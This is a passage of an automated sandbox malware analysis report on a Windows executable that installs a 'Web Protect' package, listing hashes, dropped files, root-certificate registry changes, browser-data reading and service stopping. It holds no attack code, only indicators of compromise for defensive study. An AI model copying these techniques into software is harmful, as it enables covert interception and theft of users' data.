Analysis
-
max time kernel
153s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
23-11-2022 18:59
Static task
static1
Behavioral task
behavioral1
Sample
d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe
Resource
win7-20221111-en
General
-
Target
d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe
-
Size
6.1MB
-
MD5
162c697a7742453a32217bc28bfb9e97
-
SHA1
37c6301121159d220027294f2258561f986a9408
-
SHA256
d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a
-
SHA512
7113ab0d9622ed7cae3ed8ad3e3eb2db8c93c8308136a066f8f65514c0f6b896aa32901dbf36f31eb33e18cba05d254a764cee72b2aba536f390c4ffb7244107
-
SSDEEP
98304:Pu+lqUdMYTF3htapMLtg4QwwQ7FL9z8XBlyKMqrTGEli/azGdqzr1+VV2nvlU:PuCFdpF3htTLYwbz4ZTKqVBdU
Malware Config
Signatures
-
Executes dropped EXE 16 IoCs
Processes:
precollect.exewget.exepostcollect.exewget.exewget.exewget.exemonitor.exeRegisterMyOSProtect.exeRegisterMyOSProtect64.exeMyOSProtect.exeMyOSProtect.exeDirectControl.exeMyOSProtect.exewget.exewget.exewget.exepid process 544 precollect.exe 2784 wget.exe 2292 postcollect.exe 3904 wget.exe 1488 wget.exe 2844 wget.exe 4828 monitor.exe 4084 RegisterMyOSProtect.exe 2776 RegisterMyOSProtect64.exe 3164 MyOSProtect.exe 1604 MyOSProtect.exe 4532 DirectControl.exe 4408 MyOSProtect.exe 1644 wget.exe 3120 wget.exe 4940 wget.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule C:\Program Files (x86)\Web Protect\wget.exe upx C:\Program Files (x86)\Web Protect\wget.exe upx behavioral2/memory/2784-147-0x0000000000400000-0x00000000004EF000-memory.dmp upx C:\Program Files (x86)\Web Protect\wget.exe upx behavioral2/memory/3904-161-0x0000000000400000-0x00000000004EF000-memory.dmp upx behavioral2/memory/3904-162-0x0000000000400000-0x00000000004EF000-memory.dmp upx C:\Program Files (x86)\Web Protect\wget.exe upx behavioral2/memory/1488-167-0x0000000000400000-0x00000000004EF000-memory.dmp upx C:\Program Files (x86)\Web Protect\wget.exe upx behavioral2/memory/2844-172-0x0000000000400000-0x00000000004EF000-memory.dmp upx behavioral2/memory/1644-322-0x0000000000400000-0x00000000004EF000-memory.dmp upx behavioral2/memory/3120-326-0x0000000000400000-0x00000000004EF000-memory.dmp upx behavioral2/memory/4940-330-0x0000000000400000-0x00000000004EF000-memory.dmp upx -
Loads dropped DLL 64 IoCs
Processes:
d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exeprecollect.exemonitor.exepid process 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 544 precollect.exe 544 precollect.exe 544 precollect.exe 544 precollect.exe 544 precollect.exe 544 precollect.exe 544 precollect.exe 544 precollect.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 4828 monitor.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 4828 monitor.exe 4828 monitor.exe 4828 monitor.exe 4828 monitor.exe 4828 monitor.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 10 IoCs
Processes:
RegisterMyOSProtect.exeRegisterMyOSProtect64.exeMyOSProtect.exedescription ioc process File created C:\Windows\SysWOW64\MyOSProtect.dll RegisterMyOSProtect.exe File opened for modification C:\Windows\system32\MyOSProtect64.dll RegisterMyOSProtect64.exe File created C:\Windows\SysWOW64\MyOSProtect.ini MyOSProtect.exe File created C:\Windows\SysWOW64\MyOSProtectOff.ini MyOSProtect.exe File created C:\Windows\system32\MyOSProtectOff.ini MyOSProtect.exe File opened for modification C:\Windows\system32\MyOSProtectOff.ini MyOSProtect.exe File opened for modification C:\Windows\SysWOW64\MyOSProtect.dll RegisterMyOSProtect.exe File created C:\Windows\system32\MyOSProtect64.dll RegisterMyOSProtect64.exe File opened for modification C:\Windows\SysWOW64\MyOSProtect.ini MyOSProtect.exe File opened for modification C:\Windows\SysWOW64\MyOSProtectOff.ini MyOSProtect.exe -
Drops file in Program Files directory 52 IoCs
Processes:
d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exewget.exeprecollect.exewget.exepostcollect.exewget.exewget.exewget.exewget.exewget.exedescription ioc process File created C:\Program Files (x86)\Web Protect\DirectControl.exe d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\idate.txt wget.exe File created C:\Program Files (x86)\Web Protect\MyOSProtect.dll d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\libplds4.dll d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\smime3.dll d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\webprotect.ico d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File opened for modification C:\Program Files (x86)\Web Protect\RegisterMyOSProtect.exe d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File opened for modification C:\Program Files (x86)\Web Protect\status2.txt d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File opened for modification C:\Program Files (x86)\Web Protect\status3.txt d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\postcollect.exe d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\MyOSProtect64.dll d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\RegisterMyOSProtect64.exe d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\freebl3.dll d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\nss3.dll d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\pcwtc64f.sys d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\precollect.exe d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File opened for modification C:\Program Files (x86)\Web Protect\tmpfile precollect.exe File opened for modification C:\Program Files (x86)\Web Protect\jsurl.txt d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\PCProxy.tlb d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\tmpfile wget.exe File opened for modification C:\Program Files (x86)\Web Protect\RegisterMyOSProtect.ini d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\MyOSProtect.exe d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\WDCertInstaller.dll d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\nssdbm3.dll d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\sqlite3.dll d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\ssl3.dll d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\PCProxyDLL.dll d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\wget.exe d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\nssutil3.dll d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\pcwatch.sys.win7 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\softokn3.dll d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File opened for modification C:\Program Files (x86)\Web Protect\DirectControl.exe d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File opened for modification C:\Program Files (x86)\Web Protect\tmpfile postcollect.exe File created C:\Program Files (x86)\Web Protect\status2.txt wget.exe File created C:\Program Files (x86)\Web Protect\MyOSProtect.tlb d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\RegisterMyOSProtect.ini d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\libnspr4.dll d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\nssckbi.dll d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\pcwatch.sys d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\itime.txt wget.exe File opened for modification C:\Program Files (x86)\Web Protect\itime.txt d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\status3.txt wget.exe File created C:\Program Files (x86)\Web Protect\uninstallhelper.exe d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File opened for modification C:\Program Files (x86)\Web Protect\pcwatch.sys.win7 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\RegisterMyOSProtect.exe d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\libplc4.dll d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\pcwtc64r.sys d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File created C:\Program Files (x86)\Web Protect\tmpfile wget.exe File created C:\Program Files (x86)\Web Protect\jsurl.txt wget.exe File opened for modification C:\Program Files (x86)\Web Protect\idate.txt d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File opened for modification C:\Program Files (x86)\Web Protect\pcwatch.sys d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe File opened for modification C:\Program Files (x86)\Web Protect\RegisterMyOSProtect64.exe d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid process 2052 sc.exe 1544 sc.exe 3788 sc.exe 3512 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
NSIS installer 12 IoCs
Processes:
resource yara_rule C:\Program Files (x86)\Web Protect\precollect.exe nsis_installer_1 C:\Program Files (x86)\Web Protect\precollect.exe nsis_installer_2 C:\Program Files (x86)\Web Protect\precollect.exe nsis_installer_1 C:\Program Files (x86)\Web Protect\precollect.exe nsis_installer_2 C:\Program Files (x86)\Web Protect\postcollect.exe nsis_installer_1 C:\Program Files (x86)\Web Protect\postcollect.exe nsis_installer_2 C:\Program Files (x86)\Web Protect\postcollect.exe nsis_installer_1 C:\Program Files (x86)\Web Protect\postcollect.exe nsis_installer_2 C:\monitor.exe nsis_installer_1 C:\monitor.exe nsis_installer_2 C:\monitor.exe nsis_installer_1 C:\monitor.exe nsis_installer_2 -
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.
Processes:
systeminfo.exesysteminfo.exepid process 2332 systeminfo.exe 5004 systeminfo.exe -
Modifies data under HKEY_USERS 8 IoCs
Processes:
MyOSProtect.exeMyOSProtect.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates MyOSProtect.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs MyOSProtect.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs MyOSProtect.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT MyOSProtect.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates MyOSProtect.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs MyOSProtect.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs MyOSProtect.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT MyOSProtect.exe -
Modifies registry class 64 IoCs
Processes:
MyOSProtect.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MyOSProtectLib.DataController.1 MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MyOSProtectLib.LSPLogic.1\CLSID\ = "{94B83936-77EA-4708-8FC5-F3BBC55C2A32}" MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{533403E2-6E21-4615-9E28-43F4E97E977B}\ = "DataTableFields Class" MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0FCE4F01-64EC-42F1-83E1-1E08D38605D2}\ = "ISSHController" MyOSProtect.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MyOSProtectLib.DataTableFields\CLSID MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4E9EB4D5-C929-4005-AC62-1856B1DA5A24}\TypeLib\Version = "1.0" MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0C27B569-9410-406B-BA79-3EF654739236}\ = "ILSPLogic" MyOSProtect.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8FAF962C-3EDE-405E-B1D0-62B8235C6044}\ProxyStubClsid32 MyOSProtect.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4C0A69B0-CE97-42B7-86FC-08280C99C74D}\TypeLib MyOSProtect.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MyOSProtectLib.DataTable.1 MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2F101D36-9749-4730-AA02-F1F8BD1193EA}\LocalServer32\ = "\"C:\\Program Files (x86)\\Web Protect\\MyOSProtect.exe\"" MyOSProtect.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{06FD4518-2CAB-4473-AA8D-0508134C6C1F}\Programmable MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4E9EB4D5-C929-4005-AC62-1856B1DA5A24}\TypeLib\ = "{3E4048A7-8F44-48DC-9163-16A4803F7826}" MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2D9DB233-DC4B-4677-946C-5FA5ABCF506B}\TypeLib\Version = "1.0" MyOSProtect.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6DA234CD-4043-46C6-922F-A39529AE3D4B} MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4A55DCF1-2410-4139-A579-15DED320D84A}\ = "IDataStatistics" MyOSProtect.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4C0A69B0-CE97-42B7-86FC-08280C99C74D}\ProxyStubClsid32 MyOSProtect.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{632ACF93-7DAA-4CFD-8BB5-9DCBB9116176}\ProxyStubClsid32 MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{1A86F607-D30E-46c7-A7F5-44F690F0ABB7}\InstallingUser = "aQB5AG0AdQBnAHkAaABsAFwAYQBkAG0AaQBuAAAA" MyOSProtect.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{94B83936-77EA-4708-8FC5-F3BBC55C2A32} MyOSProtect.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MyOSProtectLib.WatchDog.1\CLSID MyOSProtect.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{632ACF93-7DAA-4CFD-8BB5-9DCBB9116176} MyOSProtect.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2D9DB233-DC4B-4677-946C-5FA5ABCF506B}\ProxyStubClsid32 MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6DA234CD-4043-46C6-922F-A39529AE3D4B}\ = "IDataTableHolder" MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4A55DCF1-2410-4139-A579-15DED320D84A}\TypeLib\ = "{3E4048A7-8F44-48DC-9163-16A4803F7826}" MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MyOSProtectLib.DataTableFields.1\CLSID\ = "{533403E2-6E21-4615-9E28-43F4E97E977B}" MyOSProtect.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DA5534ED-88FD-49fa-9D2D-B92584CB21AC} MyOSProtect.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2F101D36-9749-4730-AA02-F1F8BD1193EA} MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{59A8D713-E25C-4c3f-AB27-44A4FEDD9328}\AppID = "{1A86F607-D30E-46c7-A7F5-44F690F0ABB7}" MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{06FD4518-2CAB-4473-AA8D-0508134C6C1F}\VersionIndependentProgID\ = "MyOSProtectLib.ReadOnlyManager" MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8FAF962C-3EDE-405E-B1D0-62B8235C6044}\TypeLib\Version = "1.0" MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MyOSProtectLib.DataTable\ = "DataTable Class" MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MyOSProtectLib.DataContainer.1\CLSID\ = "{2F101D36-9749-4730-AA02-F1F8BD1193EA}" MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{94B83936-77EA-4708-8FC5-F3BBC55C2A32}\VersionIndependentProgID\ = "MyOSProtectLib.LSPLogic" MyOSProtect.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{704C6F87-E9C5-44FE-B5AF-A84DB18AFB54}\ProxyStubClsid32 MyOSProtect.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MyOSProtectLib.DataTable\CLSID MyOSProtect.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MyOSProtectLib.ReadOnlyManager\CurVer MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{632ACF93-7DAA-4CFD-8BB5-9DCBB9116176}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" MyOSProtect.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E2179B6D-BB95-4004-8A51-B9E8FBE9FF24} MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8FAF962C-3EDE-405E-B1D0-62B8235C6044}\TypeLib\ = "{3E4048A7-8F44-48DC-9163-16A4803F7826}" MyOSProtect.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F60C9408-3110-4C98-A139-ABE1EE1111DD} MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{59A8D713-E25C-4c3f-AB27-44A4FEDD9328}\LocalServer32\ = "\"C:\\Program Files (x86)\\Web Protect\\MyOSProtect.exe\"" MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{632ACF93-7DAA-4CFD-8BB5-9DCBB9116176}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4A55DCF1-2410-4139-A579-15DED320D84A}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MyOSProtectLib.DataTableHolder.1\CLSID\ = "{E3F32F05-71B6-44c5-8BEE-13D239E27E98}" MyOSProtect.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MyOSProtectLib.DataTableFields.1 MyOSProtect.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MyOSProtectLib.WatchDog.1 MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{704C6F87-E9C5-44FE-B5AF-A84DB18AFB54}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1A2A195A-A0F9-4006-AF02-3F05EEFDE792}\TypeLib\Version = "1.0" MyOSProtect.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{533403E2-6E21-4615-9E28-43F4E97E977B} MyOSProtect.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{3E4048A7-8F44-48DC-9163-16A4803F7826} MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4A55DCF1-2410-4139-A579-15DED320D84A}\ = "IDataStatistics" MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MyOSProtectLib.DataController\CLSID\ = "{DE4EF20E-BC71-4a63-BC1E-C13B37815A00}" MyOSProtect.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{533403E2-6E21-4615-9E28-43F4E97E977B}\VersionIndependentProgID MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{632ACF93-7DAA-4CFD-8BB5-9DCBB9116176}\TypeLib\Version = "1.0" MyOSProtect.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{704C6F87-E9C5-44FE-B5AF-A84DB18AFB54}\ProxyStubClsid32 MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0FCE4F01-64EC-42F1-83E1-1E08D38605D2}\TypeLib\Version = "1.0" MyOSProtect.exe Set value (str) 